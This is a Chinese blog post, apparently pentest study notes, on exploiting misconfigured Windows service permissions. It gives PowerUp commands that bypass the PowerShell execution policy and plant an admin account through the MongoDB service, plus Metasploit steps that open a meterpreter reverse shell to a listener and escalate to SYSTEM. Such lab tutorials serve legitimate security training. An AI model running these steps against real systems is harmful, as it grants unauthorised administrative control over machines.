内网学习笔记 | 15、系统服务权限配置不当利用

admin 2021年11月23日07:36:39安全文章评论59 views2179字阅读7分15秒阅读模式

PowerUp

PowerUp 可以用来寻找目标中权限配置不当的服务,下载地址:https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

在 PowerShell 中导入并执行脚本

Import-Module .PowerUp.ps1Invoke-AllChecks

如果 PowerShell 由于处在受限模式以至于无法导入脚本,可以使用以下命令绕过。

powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks}"
PS C:UsersteamssixDesktop> powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks}"
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...[+] User is in a local group that grants administrative privileges![+] Run a BypassUAC attack to elevate privileges to admin.
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
ServiceName : MongoDBPath : C:Webmongodbbinmongod.exe --auth --config C:Webmongodbmongod.conf --s erviceModifiableFile : C:Webmongodbmongod.confStartName : LocalSystemAbuseFunction : Install-ServiceBinary -ServiceName 'MongoDB'

由于结果可能比较长,因此也可以将其保存到 txt 文件里,方便查看

powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks | Out-File -Encoding ASCII result.txt}"

从检查的结果可以看出 MongoDB 服务存在漏洞,利用 Install-ServiceBinary 模块,通过 PowerUp 利用该处权限配置不当添加管理员用户。

powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"
PS C:UsersteamssixDesktop> powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"
ServiceName ServicePath Command BackupPath----------- ----------- ------- ----------MongoDB C:Webmongodbbinmongod... net user test Passw0rd /ad... C:Webmongodbbinmongod...

重启系统,查看用户,发现 test 已经被添加到管理员组了。

PS C:UsersteamssixDesktop> net user test用户名                 test全名……本地组成员             *Administrators       *Users全局组成员             *None命令成功完成。

Metasploit

在 MSF 中,先看下已上线主机的权限

meterpreter > getuidServer username: TEAMSSIXdev

MSF 中对应服务权限配置不当的利用模块是 exploit/windows/local/service_permissions

利用步骤如下:

use exploit/windows/local/service_permissionsset payload windows/meterpreter/reverse_tcpset lhost 192.168.7.1set lport 4444set session 1run

内网学习笔记 | 15、系统服务权限配置不当利用

可以看到会话直接被提升到了 SYSTEM 权限。

原文链接:
https://teamssix.com/year/210722-173157.html

参考文章:

https://evi1cg.me/archives/Powerup.html


往期推荐

内网学习笔记 | 14、发现主机缺失补丁

内网学习笔记 | 13、内网中绕过无法上传文件限制

内网学习笔记 | 12、nps 的使用

内网学习笔记 | 15、系统服务权限配置不当利用

本文始发于微信公众号(TeamsSix):内网学习笔记 | 15、系统服务权限配置不当利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月23日07:36:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  内网学习笔记 | 15、系统服务权限配置不当利用 http://cn-sec.com/archives/432316.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: